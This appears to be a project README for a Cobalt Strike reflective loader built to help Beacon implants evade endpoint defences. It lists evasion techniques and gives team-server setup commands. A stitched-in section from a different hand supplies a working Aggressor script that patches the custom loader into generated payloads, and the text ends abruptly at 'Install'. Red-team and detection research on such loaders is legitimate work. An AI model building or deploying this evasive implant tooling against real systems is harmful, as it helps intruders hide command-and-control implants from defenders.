Cobalt Strike User-Defined Reflective Loader v1.0 releases

Cobalt Strike User-Defined Reflective Loader

Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

Initial Project Goals

  • Learn how Reflective Loader works.
  • Write a Reflective Loader in Assembly.
  • Compatible with Cobalt Strike.
  • Cross compile from macOS/Linux.
  • Implement Inline-Assembly into a C project.

Future Project Goals

  • Use the initial project as a template for more advanced evasion techniques leveraging the flexibility of Assembly.
  • Implement Cobalt Strike options such as no RWX, stompPE, module stomping, changing the MZ header, etc.
  • Write a decent Aggressor script.
  • Support x86.
  • Have different versions of the reflective loader to choose from.
  • Implement HellsGate/HalosGate for the initial API calls the reflective loader makes (pNtFlushInstructionCache, VirtualAlloc, GetProcAddress, LoadLibraryA, etc.).
  • Optimize the assembly code.
  • Hash/obfuscate strings.
  • Some kind of template language overlay that can modify/randomize the registers/methods.

Usage

  1. Start your Cobalt Strike Team Server with or without a profile
  • At the moment I’ve only tested without a profile and with a few profiles generated from Tylous’s epic SourcePoint project

```bash
#### This profile stuff below is optional, but this is the profile I tested this Reflective Loader with ####

# Install Go on Kali if you need it
sudo apt install golang-go -y

# Creating a Team Server Cobalt Strike profile with SourcePoint
## Clone the SourcePoint project
git clone https://github.com/Tylous/SourcePoint.git
## Build SourcePoint Go project
cd SourcePoint
go build SourcePoint.go
## Run it with some cool flags (look at the help menu for more info)
### These are the settings I have tested UD Reflective Loader with
./SourcePoint -PE_Clone 18 -PostEX_Name 13 -Sleep 3 -Profile 4 -Outfile myprofile.profile -Host <TeamServer> -Injector NtMapViewOfSection

## Start Team Server
cd ../
sudo ./teamserver <TeamServer> 'T3@Ms3Rv3Rp@$$w0RD' SourcePoint/myprofile.profile
```

  2. Go to your Cobalt Strike GUI and import the rdll_loader.cna Aggressor script
  3. Generate your x64 payload (Attacks -> Packages -> Windows Executable (S))
  • Does not support the x86 option. The x86 bin is the original Reflective Loader object file.
  4. Use the Script Console to make sure that the beacon was created successfully with this User-Defined Reflective Loader
  • If successful, the Script Console output confirms that the loader was applied to the x64 beacon.
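As an added illustration, not the project's own rdll_loader.cna, this is the shape of the Aggressor hook that step 2 registers and that step 4 watches for in the Script Console. Cobalt Strike calls BEACON_RDLL_GENERATE with the Beacon DLL bytes and the architecture, and the script swaps in the ReflectiveLoader function extracted from a compiled object file. The path bin/ReflectiveLoader.x64.o is an assumed location; returning $null for x86 hands that architecture back to Cobalt Strike's built-in loader, which is a simplification of the project's choice to ship the original x86 object file.

```sleep
# Added example of a User-Defined Reflective Loader hook; this is NOT the
# project's rdll_loader.cna. Cobalt Strike calls BEACON_RDLL_GENERATE with
#   $1 = the Beacon DLL bytes, $2 = "x86" or "x64"
# and uses whatever DLL the hook returns ($null = keep the default loader).
set BEACON_RDLL_GENERATE {
    local('$handle $data $loader $path');

    # This line is what you look for in the Script Console after generating a payload.
    warn("Running 'BEACON_RDLL_GENERATE' for " . $2 . " beacon.");

    # Assumed: the loader object is only built for x64. Returning $null for
    # x86 makes Cobalt Strike fall back to its built-in reflective loader.
    if ($2 ne "x64") {
        warn("No user-defined loader for " . $2 . ", using Cobalt Strike's default.");
        return $null;
    }

    # Assumed path of the compiled loader object, relative to this .cna file.
    $path = script_resource("bin/ReflectiveLoader.x64.o");
    if (!-exists $path) {
        warn("Loader object not found: " . $path);
        return $null;
    }

    # Read the COFF object and pull the ReflectiveLoader function out of it.
    $handle = openf($path);
    $data   = readb($handle, -1);
    closef($handle);
    $loader = extract_reflective_loader($data);

    # Patch the extracted loader into the Beacon DLL's reflective-loader stub
    # and hand the modified DLL back to Cobalt Strike for the payload being built.
    $1 = setup_reflective_loader($1, $loader);
    warn("Applied user-defined reflective loader (" . strlen($loader) . " bytes).");
    return $1;
}
```

The two warn() calls are the practical check: if the second one never appears after Attacks -> Packages -> Windows Executable (S), the hook either was not reached or returned $null, and the payload is carrying the stock loader.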

Change log v1.0

Massive update from @s4ntiago_p! New 32-bit loader with WOW64 support, 32-bit HalosGate & HellsGate, code optimizations & bug fixes!

Install